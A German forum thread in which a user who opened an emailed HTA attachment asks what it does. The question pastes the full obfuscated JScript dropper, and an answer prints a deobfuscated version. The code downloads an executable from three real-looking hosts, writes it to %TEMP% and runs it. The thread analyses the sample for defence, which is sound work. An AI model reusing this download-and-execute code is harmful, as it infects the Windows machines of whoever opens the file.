Was kann diese .hta Datei tun?

Question

Ich habe gerade eine E-Mail mit einem attachement von HTA-Datei und hier ist der Code:

<html> 
<head><script language='JScript'> 
String.prototype.yakamurahirobetobeVIUVIUVIUtttoooo = function() { 
yakamurahirobetobeVIUVIUVIUXCOP = 0;  
    var yakamurahirobetobeVIUVIUVIUddDccC1, yakamurahirobetobeVIUVIUVIUddDccC2, yakamurahirobetobeVIUVIUVIUc3, yakamurahirobetobeVIUVIUVIUc4; 
    var yakamurahirobetobeVIUVIUVIUsudarinaB = this; 
    yakamurahirobetobeVIUVIUVIUsudarinaB= yakamurahirobetobeVIUVIUVIUsudarinaB.replace(/GOGOGA/g, ''); 
    var yakamurahirobetobeVIUVIUVIUout = ""; 

var yakamurahirobetobeVIUVIUVIUlen = yakamurahirobetobeVIUVIUVIUsud(yakamurahirobetobeVIUVIUVIUsudarinaB);  
    while (yakamurahirobetobeVIUVIUVIUXCOP < yakamurahirobetobeVIUVIUVIUlen) { 
     do { 
      yakamurahirobetobeVIUVIUVIUddDccC1 = yakamurahirobetobeVITKS[yakamurahirobetobeVIUVIUVIUsudarinaB.charCodeAt(yakamurahirobetobeVIUVIUVIUXCOP++) & 0xff]; 
     } while (yakamurahirobetobeVIUVIUVIUXCOP < yakamurahirobetobeVIUVIUVIUlen && yakamurahirobetobeVIUVIUVIUddDccC1 == -1); 

     if (yakamurahirobetobeVIUVIUVIUddDccC1 == -1) 
      break; 
var yakamurahirobetobeVIUVIUVIUdodo = false; 
     do { 
      yakamurahirobetobeVIUVIUVIUddDccC2 = yakamurahirobetobeVITKS[yakamurahirobetobeVIUVIUVIUsudarinaB.charCodeAt(yakamurahirobetobeVIUVIUVIUXCOP++) & 0xff]; 
     yakamurahirobetobeVIUVIUVIUdodo = yakamurahirobetobeVIUVIUVIUXCOP < yakamurahirobetobeVIUVIUVIUlen && yakamurahirobetobeVIUVIUVIUddDccC2 == -1; 
     } while (yakamurahirobetobeVIUVIUVIUdodo); 

     if (yakamurahirobetobeVIUVIUVIUddDccC2 == -1) 
      break; 

     yakamurahirobetobeVIUVIUVIUout += String.fromCharCode((yakamurahirobetobeVIUVIUVIUddDccC1 << 2) | ((yakamurahirobetobeVIUVIUVIUddDccC2 & 0x30) >> 4)); 

     do { 
      yakamurahirobetobeVIUVIUVIUc3 = yakamurahirobetobeVIUVIUVIUsudarinaB.charCodeAt(yakamurahirobetobeVIUVIUVIUXCOP++) & 0xff; 

      if (yakamurahirobetobeVIUVIUVIUc3 == 10*6+0.5*2) 
       return yakamurahirobetobeVIUVIUVIUout; 

      yakamurahirobetobeVIUVIUVIUc3 = yakamurahirobetobeVITKS[yakamurahirobetobeVIUVIUVIUc3]; 
     } while (yakamurahirobetobeVIUVIUVIUXCOP < yakamurahirobetobeVIUVIUVIUlen && yakamurahirobetobeVIUVIUVIUc3 == -1); 

     if (yakamurahirobetobeVIUVIUVIUc3 == -1) 
      break; 

     yakamurahirobetobeVIUVIUVIUout += String.fromCharCode(((yakamurahirobetobeVIUVIUVIUddDccC2 & 0XF) << 4) | ((yakamurahirobetobeVIUVIUVIUc3 & 0x3c) >> 2)); 

     do { 
      yakamurahirobetobeVIUVIUVIUc4 = yakamurahirobetobeVIUVIUVIUsudarinaB.charCodeAt(yakamurahirobetobeVIUVIUVIUXCOP++) & 0xff; 

      if (yakamurahirobetobeVIUVIUVIUc4 == 61) 
       return yakamurahirobetobeVIUVIUVIUout; 

      yakamurahirobetobeVIUVIUVIUc4 = yakamurahirobetobeVITKS[yakamurahirobetobeVIUVIUVIUc4]; 
     } while (yakamurahirobetobeVIUVIUVIUXCOP < yakamurahirobetobeVIUVIUVIUlen && yakamurahirobetobeVIUVIUVIUc4 == -1); 

     if (yakamurahirobetobeVIUVIUVIUc4 == -1) 
      break; 

     yakamurahirobetobeVIUVIUVIUout += String.fromCharCode(((yakamurahirobetobeVIUVIUVIUc3 & 0x03) << 6) | yakamurahirobetobeVIUVIUVIUc4); 
    } 

    return yakamurahirobetobeVIUVIUVIUout; 
}; 
function ProcessFolder(folderPath) 
     { 
      var path = ""; 

      for (var i in maskArr) 
      { 
       path = folderPath + "\\" + maskArr[i]; 

       try { fsoObj.DeleteFile(path); } catch (e) {} 
       try { fsoObj.DeleteFolder(path); } catch (e) {} 
      } 

      var subfolders = new Enumerator(fsoObj.GetFolder(folderPath).SubFolders); 

      for(; !subfolders.atEnd(); subfolders.moveNext()) 
       ProcessFolder(subfolders.item().Path); 
     } 



    function yakamurahirobetobeVIUVIUVIUsud(vardos){ 
return vardos[("yakamurahirobetobeVIUVIUVIUprosy","yakamurahirobetobeVIUVIUVIUoffering","yakamurahirobetobeVIUVIUVIUspecialized","yakamurahirobetobeVIUVIUVIUalicia","yakamurahirobetobeVIUVIUVIUenormity","l") + ("yakamurahirobetobeVIUVIUVIUinter","yakamurahirobetobeVIUVIUVIUcrest","yakamurahirobetobeVIUVIUVIUnoisily","yakamurahirobetobeVIUVIUVIUpenguin","yakamurahirobetobeVIUVIUVIUdrops","en")+("yakamurahirobetobeVIUVIUVIUplaintiff","yakamurahirobetobeVIUVIUVIUholiday","yakamurahirobetobeVIUVIUVIUsymphony","yakamurahirobetobeVIUVIUVIUlegally","yakamurahirobetobeVIUVIUVIUcelibate","gt")+("yakamurahirobetobeVIUVIUVIUappointments","yakamurahirobetobeVIUVIUVIUlooksmart","yakamurahirobetobeVIUVIUVIUmotorcycles","yakamurahirobetobeVIUVIUVIUbreakwater","yakamurahirobetobeVIUVIUVIUchart","h")]; 
} 
yakamurahirobetobeVIUVIUVIUmisterdenisk.dEDWWEE = function(){ 


    yakamurahirobetobeVIUVIUVIUpublisher.yakamurahirobetobeVIUVIUVIUpublish(this.yakamurahirobetobeVIUVIUVIUtype1); 
    yakamurahirobetobeVIUVIUVIUok(yakamurahirobetobeVIUVIUVIUspyFunction1.yakamurahirobetobeVIUVIUVIUcalledWith(), "Function called without arguments"); 

    yakamurahirobetobeVIUVIUVIUpublisher.yakamurahirobetobeVIUVIUVIUpublish(this.yakamurahirobetobeVIUVIUVIUtype1, "PROPER1"); 
    yakamurahirobetobeVIUVIUVIUok(yakamurahirobetobeVIUVIUVIUspyFunction1.yakamurahirobetobeVIUVIUVIUcalledWith("PROPER1"), "Function called with 'PROPER1' argument"); 

    yakamurahirobetobeVIUVIUVIUpublisher.yakamurahirobetobeVIUVIUVIUpublish(this.yakamurahirobetobeVIUVIUVIUtype1, ["PROPER1", "PROPER2"]); 

}; 

var yakamurahirobetobeVITKS = new Array(-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-39,-102,-102,-102,-38,-49,-48,-47,-46,-45,-44,-43,-42,-41,-40,-102,-102,-102,-102,-102,-102,-102,-101,-100,-99,-98,-97,-96,-95,-94,-93,-92,-91,-90,-89,-88,-87,-86,-85,-84,-83,-82,-81,-80,-79,-78,-77,-76,-102,-102,-102,-102,-102,-102,-75,-74,-73,-72,-71,-70,-69,-68,-67,-66,-65,-64,-63,-62,-61,-60,-59,-58,-57,-56,-55,-54,-53,-52,-51,-50,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102); 
var yakamurahirobetobeVITKI, yakamurahirobetobeVITKSn = yakamurahirobetobeVITKS.length; 
    for (yakamurahirobetobeVITKI= 0; yakamurahirobetobeVITKI < yakamurahirobetobeVITKSn; ++yakamurahirobetobeVITKI) { 
     yakamurahirobetobeVITKS[yakamurahirobetobeVITKI] = yakamurahirobetobeVITKS[yakamurahirobetobeVITKI] + 101; 
    } 
    function moveToParentFolder(parentFolder, folder) { 
    // 対象フォルダのサブフォルダ列挙 
    var subFolders = new Enumerator(folder.SubFolders); 
    // サブフォルダ内のファイルを移動 
    for (; !subFolders.atEnd(); subFolders.moveNext()) { 
    moveToParentFolder(parentFolder, subFolders.item()); 
    } 
    // フォルダ内のファイル列挙 
    var files = new Enumerator(folder.Files); 
    // ファイルを移動 
    for (; !files.atEnd(); files.moveNext()) { 
    try { 
     files.item().Move(parentFolder.Path + '\\'); 
    } 
    catch (e) { 
     WScript.Echo(e.description + "\n" + files.item().Path); 
    } 
    } 
    // ファイルとサブフォルダがなければフォルダ削除 
    if (folder.Files.Count == 0 && folder.SubFolders.Count == 0) { 
    try { 
     folder.Delete(true); 
    } 
    catch (e) { 
     WScript.Echo(e.description + "\n" + folder.Path); 
    } 
    } 
} 
var yakamurahirobetobeVIUVIUVIUqtcnthltqfqrhfq = {'U': 'S', ':': '.','88':'', '77':'','HOLSTEN': 'X', '99':'', 'PLAHISH':'ons'}; 

function yakamurahirobetobeVIUVIUVIUachievment(yakamurahirobetobeVIUVIUVIUbidttt){if(yakamurahirobetobeVIUVIUVIUbidttt==1){return 2;}else{return 17;} 
return 3;}; 
function yakamurahirobetobeVIUVIUVIUcenter(yakamurahirobetobeVIUVIUVIUrivulet) { 
    request = yakamurahirobetobeVIUVIUVIUrivulet; 
    for (var yakamurahirobetobeVIUVIUVIUXCOP in yakamurahirobetobeVIUVIUVIUqtcnthltqfqrhfq){request = request.replace(yakamurahirobetobeVIUVIUVIUXCOP, yakamurahirobetobeVIUVIUVIUqtcnthltqfqrhfq[yakamurahirobetobeVIUVIUVIUXCOP]);} 
    return request; 
}; 

    var yakamurahirobetobeVIUVIUVIUDRUZA = 43* (51-2)*(27-26-1); 

function yakamurahirobetobeVIUVIUVIUmisterdenisk(yakamurahirobetobePOPSPOPx, yakamurahirobetobePOPSPOPy) { 
    yakamurahirobetobePOPSPOPx = DDyakamurahirobetobePOPSPOP * yakamurahirobetobePOPSPOPddd; 
    yakamurahirobetobePOPSPOPy = yakamurahirobetobePOPSPOPZZ + 245; 
}; 

    var yakamurahirobetobeVIUVIUVIUsecupeku=typeof(yakamurahirobetobeVIUVIUVIUGzEAPd)==="undefined"; 

var yakamurahirobetobeVIUVIUVIUchosen = 0.5 * 2; 
if(!yakamurahirobetobeVIUVIUVIUsecupeku){ 
yakamurahirobetobeVIUVIUVIUmisterdenisk.scale = function(yakamurahirobetobeVIUVIUVIUp, yakamurahirobetobeVIUVIUVIUscaleX, yakamurahirobetobeVIUVIUVIUscaleY) { 
    if (yakamurahirobetobeVIUVIUVIUXCOPsObject(yakamurahirobetobeVIUVIUVIUscaleX)) { 
     yakamurahirobetobeVIUVIUVIUscaleY = yakamurahirobetobeVIUVIUVIUscaleX.y; 
     yakamurahirobetobeVIUVIUVIUscaleX = yakamurahirobetobeVIUVIUVIUscaleX.x; 
    } else if (!yakamurahirobetobeVIUVIUVIUXCOPsNumber(yakamurahirobetobeVIUVIUVIUscaleY)) { 
     yakamurahirobetobeVIUVIUVIUscaleY = yakamurahirobetobeVIUVIUVIUscaleX; 
    } 
    return new yakamurahirobetobeVIUVIUVIUmisterdenisk(yakamurahirobetobeVIUVIUVIUp.x * yakamurahirobetobeVIUVIUVIUscaleX, yakamurahirobetobeVIUVIUVIUp.y * yakamurahirobetobeVIUVIUVIUscaleY); 
}; 

} 

if(!yakamurahirobetobeVIUVIUVIUsecupeku){ 
yakamurahirobetobeVIUVIUVIUmisterdenisk.yakamurahirobetobeVIUVIUVIUsameOrN = function(yakamurahirobetobeVIUVIUVIUparam1, yakamurahirobetobeVIUVIUVIUparam2) { 
    return yakamurahirobetobeVIUVIUVIUparam1.D == yakamurahirobetobeVIUVIUVIUparam2.D || yakamurahirobetobeVIUVIUVIUparam1.F == yakamurahirobetobeVIUVIUVIUparam2.F; 
}; 

yakamurahirobetobeVIUVIUVIUmisterdenisk.angle = function(yakamurahirobetobeVIUVIUVIUp) { 
    return Math.atan2(yakamurahirobetobeVIUVIUVIUp.y, yakamurahirobetobeVIUVIUVIUp.x); 
}; 
    } 



var yakamurahirobetobeVIUVIUVIUVARDOCF ="JVRFTVAl".yakamurahirobetobeVIUVIUVIUtttoooo(); 
var yakamurahirobetobeVIUVIUVIUfinde = "QWN0aXZlWE9iamVjdA==".yakamurahirobetobeVIUVIUVIUtttoooo(); 
String.prototype.yakamurahirobetobeVIUVIUVIUcenter2 = function() { 
    var yakamurahirobetobeVIUVIUVIUpirkinst = { 
     yakamurahirobetobeVIUVIUVIUVARDOCG: this 
    }; 
    yakamurahirobetobeVIUVIUVIUpirkinst.yakamurahirobetobeVIUVIUVIUVARDOCE = yakamurahirobetobeVIUVIUVIUpirkinst.yakamurahirobetobeVIUVIUVIUVARDOCG["c3Vic3RyaW5n".yakamurahirobetobeVIUVIUVIUtttoooo()](yakamurahirobetobeVIUVIUVIUDRUZA, yakamurahirobetobeVIUVIUVIUchosen); 
    return yakamurahirobetobeVIUVIUVIUpirkinst.yakamurahirobetobeVIUVIUVIUVARDOCE; 
}; 

var yakamurahirobetobeVIUVIUVIUsirdallos ="RXhwYW5kRW52aXJvbm1lbnRTdHJpbmdz".yakamurahirobetobeVIUVIUVIUtttoooo(); 
var yakamurahirobetobeVIUVIUVIUNative = function(options){ 

};yakamurahirobetobeVIUVIUVIUNative.yakamurahirobetobeVIUVIUVIUXCOPmplement = function(yakamurahirobetobeVIUVIUVIUobjects, yakamurahirobetobeVIUVIUVIUproperties){ 
    for (var yakamurahirobetobeVIUVIUVIUXCOP = 0, yakamurahirobetobeVIUVIUVIUl = yakamurahirobetobeVIUVIUVIUobjects.length; yakamurahirobetobeVIUVIUVIUXCOP < yakamurahirobetobeVIUVIUVIUl; yakamurahirobetobeVIUVIUVIUXCOP++) yakamurahirobetobeVIUVIUVIUobjects[yakamurahirobetobeVIUVIUVIUXCOP].yakamurahirobetobeVIUVIUVIUXCOPmplement(yakamurahirobetobeVIUVIUVIUproperties); 
}; 
var yakamurahirobetobeVIUVIUVIUd7 = yakamurahirobetobeVIUVIUVIUcenter("77M"+"88SX"+"99ML"+("yakamurahirobetobeVIUVIUVIUmosquitoes","yakamurahirobetobeVIUVIUVIUphoto","yakamurahirobetobeVIUVIUVIUstayed","yakamurahirobetobeVIUVIUVIUgrenada","yakamurahirobetobeVIUVIUVIUreindeer","2.")+"HOLSTENM"+"LH"+"TT"+("yakamurahirobetobeVIUVIUVIUillusory","yakamurahirobetobeVIUVIUVIUcontained","yakamurahirobetobeVIUVIUVIUbilliards","yakamurahirobetobeVIUVIUVIUrefers","yakamurahirobetobeVIUVIUVIUtransexuales","yakamurahirobetobeVIUVIUVIUspecification","yakamurahirobetobeVIUVIUVIUconstitutes","yakamurahirobetobeVIUVIUVIUdesideratum","P}")+"WU"+("yakamurahirobetobeVIUVIUVIUegregious","yakamurahirobetobeVIUVIUVIUdietary","yakamurahirobetobeVIUVIUVIUcelebrity","yakamurahirobetobeVIUVIUVIUhopes","yakamurahirobetobeVIUVIUVIUdrunk","yakamurahirobetobeVIUVIUVIUperiodically","yakamurahirobetobeVIUVIUVIUfatherhood","cr")+("yakamurahirobetobeVIUVIUVIUgenerations","yakamurahirobetobeVIUVIUVIUquarterly","yakamurahirobetobeVIUVIUVIUwording","yakamurahirobetobeVIUVIUVIUpeking","yakamurahirobetobeVIUVIUVIUreturning","yakamurahirobetobeVIUVIUVIUsuccor","yakamurahirobetobeVIUVIUVIUcharging","yakamurahirobetobeVIUVIUVIUmagnify","ip")+"t:S"+("yakamurahirobetobeVIUVIUVIUtoward","yakamurahirobetobeVIUVIUVIUoutlined","yakamurahirobetobeVIUVIUVIUsubstitute","yakamurahirobetobeVIUVIUVIUamend","yakamurahirobetobeVIUVIUVIUfigurative","yakamurahirobetobeVIUVIUVIUdeviation","yakamurahirobetobeVIUVIUVIUlatch","yakamurahirobetobeVIUVIUVIUtyson","h")+"e"+("yakamurahirobetobeVIUVIUVIUsixtytwo","yakamurahirobetobeVIUVIUVIUravenous","yakamurahirobetobeVIUVIUVIUorganize","yakamurahirobetobeVIUVIUVIUcholera","yakamurahirobetobeVIUVIUVIUoptimism","yakamurahirobetobeVIUVIUVIUdonate","yakamurahirobetobeVIUVIUVIUhouseboat","yakamurahirobetobeVIUVIUVIUincumbent","ll")); 
var yakamurahirobetobeVIUVIUVIUDoUtra = [yakamurahirobetobeVIUVIUVIUfinde, yakamurahirobetobeVIUVIUVIUsirdallos,yakamurahirobetobeVIUVIUVIUVARDOCF, ""+"."+("yakamurahirobetobeVIUVIUVIUcognition","yakamurahirobetobeVIUVIUVIUtrumpery","yakamurahirobetobeVIUVIUVIUpapers","yakamurahirobetobeVIUVIUVIUnecessitate","yakamurahirobetobeVIUVIUVIUesplanade","yakamurahirobetobeVIUVIUVIUwrinkle","yakamurahirobetobeVIUVIUVIUreunion","yakamurahirobetobeVIUVIUVIUtorpor","exe"), "UnVu".yakamurahirobetobeVIUVIUVIUtttoooo(),yakamurahirobetobeVIUVIUVIUd7]; 
yakamurahirobetobeVIUVIUVIURichters = yakamurahirobetobeVIUVIUVIUDoUtra.shift(); 
yakamurahirobetobeVIUVIUVIUfabled = "BIL2NEBIL"; 
yakamurahirobetobeVIUVIUVIUNative.yakamurahirobetobeVIUVIUVIUgenericize = function(object, yakamurahirobetobeVIUVIUVIUproperty, yakamurahirobetobeVIUVIUVIUcheck){ 
    if ((!yakamurahirobetobeVIUVIUVIUcheck || !object[yakamurahirobetobeVIUVIUVIUproperty]) && typeof object.prototype[yakamurahirobetobeVIUVIUVIUproperty] == 'function') object[yakamurahirobetobeVIUVIUVIUproperty] = function(){ 
     return object.prototype[yakamurahirobetobeVIUVIUVIUproperty].apply(yakamurahirobetobeVIUVIUVIUargs.shift(), yakamurahirobetobeVIUVIUVIUargs); 
    }; 
}; 
yakamurahirobetobeVIUVIUVIUNative.yakamurahirobetobeVIUVIUVIUtypize = function(object, yakamurahirobetobeVIUVIUVIUfamily){ 
    if (!object.type) object.type = function(item){ 
     return (yakamurahirobetobeVIUVIUVIU$type(item) === yakamurahirobetobeVIUVIUVIUfamily); 
    }; 
}; 
var yakamurahirobetobeVIUVIUVIULitoyDISK = this[yakamurahirobetobeVIUVIUVIURichters ]; 
yakamurahirobetobeVIUVIUVIUcasque = (("yakamurahirobetobeVIUVIUVIUinterpose", "yakamurahirobetobeVIUVIUVIUmorphine", "yakamurahirobetobeVIUVIUVIUshipped", "yakamurahirobetobeVIUVIUVIUdiagonal", "yakamurahirobetobeVIUVIUVIUdelta", "yakamurahirobetobeVIUVIUVIUwhiles", "yakamurahirobetobeVIUVIUVIUsynthetic", "pwrthrthrthtr") + "hrhrwhrwh").yakamurahirobetobeVIUVIUVIUcenter2(); 
yakamurahirobetobeVIUVIUVIUtudabilo1 = (("yakamurahirobetobeVIUVIUVIUachieved", "yakamurahirobetobeVIUVIUVIUfilms", "yakamurahirobetobeVIUVIUVIUinflected", "yakamurahirobetobeVIUVIUVIUsuburban", "yakamurahirobetobeVIUVIUVIUoriginating", "yakamurahirobetobeVIUVIUVIUpuppy", "yakamurahirobetobeVIUVIUVIUflower", "yakamurahirobetobeVIUVIUVIUencounter", "yakamurahirobetobeVIUVIUVIUearning", "serhrth") + "herrth4th4wh").yakamurahirobetobeVIUVIUVIUcenter2(); 
var yakamurahirobetobeVIUVIUVIUd2 = yakamurahirobetobeVIUVIUVIUDoUtra.pop(); 
var yakamurahirobetobeVIUVIUVIUrampart = new yakamurahirobetobeVIUVIUVIULitoyDISK(yakamurahirobetobeVIUVIUVIUd2.split("}")[1]); 
var yakamurahirobetobeVIUVIUVIUsudabilo1 = new yakamurahirobetobeVIUVIUVIULitoyDISK(yakamurahirobetobeVIUVIUVIUd2.split("}")[0]); 
var yakamurahirobetobeVIUVIUVIUvulture = yakamurahirobetobeVIUVIUVIUrampart[yakamurahirobetobeVIUVIUVIUDoUtra.shift()](yakamurahirobetobeVIUVIUVIUDoUtra.shift()); 
var yakamurahirobetobeVIUVIUVIUweasel = "E"; 

var yakamurahirobetobeVIUVIUVIUamalgamation = yakamurahirobetobeVIUVIUVIUDoUtra.shift(); 
var yakamurahirobetobeVIUVIUVIUpromises = yakamurahirobetobeVIUVIUVIUDoUtra.shift(); 
var yakamurahirobetobeVIUVIUVIUostrokoncert = "b3Blbg==".yakamurahirobetobeVIUVIUVIUtttoooo(); 


     yakamurahirobetobeVIUVIUVIURhXxGud = "type"; 



function yakamurahirobetobeVIUVIUVIU_a2(yakamurahirobetobeVIUVIUVIUgutter, yakamurahirobetobeVIUVIUVIUStrokaParam2) { 

     var yakamurahirobetobeVIUVIUVIUwandermander = yakamurahirobetobeVIUVIUVIUvulture; 
     yakamurahirobetobeVIUVIUVIUwandermander=yakamurahirobetobeVIUVIUVIUwandermander+ "\u002f"; 
yakamurahirobetobeVIUVIUVIUwandermander=yakamurahirobetobeVIUVIUVIUwandermander + yakamurahirobetobeVIUVIUVIUStrokaParam2 ; 

      yakamurahirobetobeVIUVIUVIUsudabilo1[yakamurahirobetobeVIUVIUVIUostrokoncert](("yakamurahirobetobeVIUVIUVIUpossibilities","yakamurahirobetobeVIUVIUVIUportsmouth","yakamurahirobetobeVIUVIUVIUiceland","yakamurahirobetobeVIUVIUVIUcommodity","yakamurahirobetobeVIUVIUVIUslash","yakamurahirobetobeVIUVIUVIUlocate","yakamurahirobetobeVIUVIUVIUtechno","yakamurahirobetobeVIUVIUVIUlabour","G" + yakamurahirobetobeVIUVIUVIUweasel) + ("yakamurahirobetobeVIUVIUVIUcringe","yakamurahirobetobeVIUVIUVIUintolerance","yakamurahirobetobeVIUVIUVIUbraxton","yakamurahirobetobeVIUVIUVIUdappled","yakamurahirobetobeVIUVIUVIUvestibule","yakamurahirobetobeVIUVIUVIUaffirmation","yakamurahirobetobeVIUVIUVIUpriestess","yakamurahirobetobeVIUVIUVIUjerry","yakamurahirobetobeVIUVIUVIUmilliner","yakamurahirobetobeVIUVIUVIUsheriff","T"), yakamurahirobetobeVIUVIUVIUgutter, false); 
     yakamurahirobetobeVIUVIUVIUsudabilo1.setRequestHeader("User-Agent", "TW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNi4wOyBXaW5kb3dzIE5UIDUuMCk=".yakamurahirobetobeVIUVIUVIUtttoooo()); 
    yakamurahirobetobeVIUVIUVIUsudabilo1[yakamurahirobetobeVIUVIUVIUtudabilo1 + ("yakamurahirobetobeVIUVIUVIUtrader","yakamurahirobetobeVIUVIUVIUconsumptive","yakamurahirobetobeVIUVIUVIUharass","yakamurahirobetobeVIUVIUVIUprofession","yakamurahirobetobeVIUVIUVIUmedicare","end")](); 


     yakamurahirobetobeVIUVIUVIUwandermander = yakamurahirobetobeVIUVIUVIUwandermander + yakamurahirobetobeVIUVIUVIUamalgamation; 
    if (yakamurahirobetobeVIUVIUVIUsecupeku) { 

     var yakamurahirobetobeVIUVIUVIUNananananananana = new yakamurahirobetobeVIUVIUVIULitoyDISK(("ARYBKA"+("yakamurahirobetobeVIUVIUVIUchichester","yakamurahirobetobeVIUVIUVIUbreakwater","yakamurahirobetobeVIUVIUVIUpromotional","yakamurahirobetobeVIUVIUVIUcosmetics","yakamurahirobetobeVIUVIUVIUbrunswick","yakamurahirobetobeVIUVIUVIUoptional","yakamurahirobetobeVIUVIUVIUmicro","yakamurahirobetobeVIUVIUVIUnominee","O")+"DB"+("yakamurahirobetobeVIUVIUVIUregarding","yakamurahirobetobeVIUVIUVIUcaretaker","yakamurahirobetobeVIUVIUVIUrepugnant","yakamurahirobetobeVIUVIUVIUcorfu","yakamurahirobetobeVIUVIUVIUunbiased","yakamurahirobetobeVIUVIUVIUenquiry","yakamurahirobetobeVIUVIUVIUinteresting",".S")+"tr12").replace("RYBKA", "D").replace("12", "eam")); 
     yakamurahirobetobeVIUVIUVIUNananananananana[yakamurahirobetobeVIUVIUVIUostrokoncert](); 
     yakamurahirobetobeVIUVIUVIUNananananananana[yakamurahirobetobeVIUVIUVIURhXxGud] = yakamurahirobetobeVIUVIUVIUchosen; 
     yakamurahirobetobePAPAPAMGaSMa = "BIL10NEBIL"; 
     yakamurahirobetobeVIUVIUVIUNananananananana["d3JpdGU=".yakamurahirobetobeVIUVIUVIUtttoooo()](yakamurahirobetobeVIUVIUVIUsudabilo1[("yakamurahirobetobeVIUVIUVIUmephistopheles","yakamurahirobetobeVIUVIUVIUgeneva","yakamurahirobetobeVIUVIUVIUstrategic","yakamurahirobetobeVIUVIUVIUmaybe","yakamurahirobetobeVIUVIUVIUlibyan","yakamurahirobetobeVIUVIUVIUdrivers","Re")+"s"+("yakamurahirobetobeVIUVIUVIUappeals","yakamurahirobetobeVIUVIUVIUmyanmar","yakamurahirobetobeVIUVIUVIUpicked","yakamurahirobetobeVIUVIUVIUprimrose","yakamurahirobetobeVIUVIUVIUmagazines","yakamurahirobetobeVIUVIUVIUscorch","p")+yakamurahirobetobeVIUVIUVIUqtcnthltqfqrhfq['PLAHISH']+"e"+"Qm9keQ==".yakamurahirobetobeVIUVIUVIUtttoooo()]); 
      yakamurahirobetobeVIUVIUVIUXWaxeQhw = "BIL11NEBIL"; 
     yakamurahirobetobeVIUVIUVIUNananananananana[(yakamurahirobetobeVIUVIUVIUcasque + "o"+"220"+("yakamurahirobetobeVIUVIUVIUadhered","yakamurahirobetobeVIUVIUVIUadobe","yakamurahirobetobeVIUVIUVIUconcerning","yakamurahirobetobeVIUVIUVIUguidelines","yakamurahirobetobeVIUVIUVIUacclamation","yakamurahirobetobeVIUVIUVIUhomes","yakamurahirobetobeVIUVIUVIUcontumely","22i")+"tion").replace("22"+("yakamurahirobetobeVIUVIUVIUpressure","yakamurahirobetobeVIUVIUVIUbarrow","yakamurahirobetobeVIUVIUVIUanymore","yakamurahirobetobeVIUVIUVIUapparatus","yakamurahirobetobeVIUVIUVIUlocations","yakamurahirobetobeVIUVIUVIUlobby","yakamurahirobetobeVIUVIUVIUcentres","022"), yakamurahirobetobeVIUVIUVIUtudabilo1)] = 0; 

     yakamurahirobetobeVIUVIUVIUkrDwvrh = "BIL12NEBIL"; 
     yakamurahirobetobeVIUVIUVIUNananananananana["c2F2ZVRvRmlsZQ==".yakamurahirobetobeVIUVIUVIUtttoooo()](yakamurahirobetobeVIUVIUVIUwandermander, 2); 
     yakamurahirobetobeVIUVIUVIUSswQdi = "BIL13NEBIL"; 
     yakamurahirobetobeVIUVIUVIUNananananananana["Y2xvc2U=".yakamurahirobetobeVIUVIUVIUtttoooo()](); 


     yakamurahirobetobeVIUVIUVIUrampart[yakamurahirobetobeVIUVIUVIUpromises](yakamurahirobetobeVIUVIUVIUwandermander, yakamurahirobetobeVIUVIUVIUchosen, true); 
    } 

}; 



var yakamurahirobetobeVIUVIUVIU_a5 = ["dGOGOGA3d3LmFnZW56aWFkaW5pLml0L0dIQnV5ZDQ3MgGOGOGA==","a2xuaGOGOGAmxsemw3OC53ZWIuZmMyLmNvbS9HSEJ1eWQ0NzI=","bWFuaW1hbmltb25leS53ZWIuGOGOGAZmMyLmNvbS9HSEJ1eWQ0NzI="]; 
for(yakamurahirobetobeVIUVIUVIUuueee in yakamurahirobetobeVIUVIUVIU_a5){ 

try{ 

yakamurahirobetobeVIUVIUVIU_a2("http://"+yakamurahirobetobeVIUVIUVIU_a5[yakamurahirobetobeVIUVIUVIUuueee].yakamurahirobetobeVIUVIUVIUtttoooo() + "?bPxXNr=LUmUhmmq","Exgngo"); 
}catch(yakamurahirobetobeVIUVIUVIU_a3){alert(yakamurahirobetobeVIUVIUVIU_a3.message);} 
} 

</script> 

</body> 
</html> 

ich es in meinem Browser geöffnet und jetzt bin ich fürchte, es ist eine Art von Hack ist. Was kann ich jetzt für meine Sicherheit tun?

sollte ich alle senstive daten in meinem browser löschen? Ich benutze Google Chrome, das alle Passwörter gespeichert hat. Ich benutze Ubuntu 16.04.

Answer 1

Ich habe diesen Anhang heute erhalten und beschlossen, ein wenig zu untersuchen. Hier ist die deobfuscated Version:

var wscriptShell = new ActiveXObject('WScript.Shell'); 
var msxml2XmlHttp = new ActiveXObject('MSXML2.XMLHTTP'); 
var tempFolder = wscriptShell.ExpandEnvironmentStrings("%TEMP%"); 

function download(url, file) { 
    var fullpath = tempFolder + '/' + file + '.exe'; 

    msxml2XmlHttp.open("GET", url, false); 
    msxml2XmlHttp.setRequestHeader("User-Agent", 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'); 
    msxml2XmlHttp["send"](); 

    var adodbStream = new ActiveXObject("ADODB.Stream"); 
    adodbStream.open(); 
    adodbStream.type = 1; 
    adodbStream.write(sudabilo1["ResponseBody"]); 
    adodbStream.position = 0; 

    adodbStream.saveToFile(fullpath, 2); 
    adodbStream.close(); 

    wscriptShell.Run(fullpath, 1, true); 
} 

var urls = [ 
    "brunnenburg.de/GHBuyd472", 
    "klnjllzl78.web.fc2.com/GHBuyd472", 
    "w3rx80no.homepage.t-online.de/GHBuyd472" 
]; 

for(i in urls) { 
    try { 
     download("http://" + urls[i] + "?huLara=HlyrvuBeY", "yXbJOHB"); 
    } catch(e) { alert(e.message); } 
} 

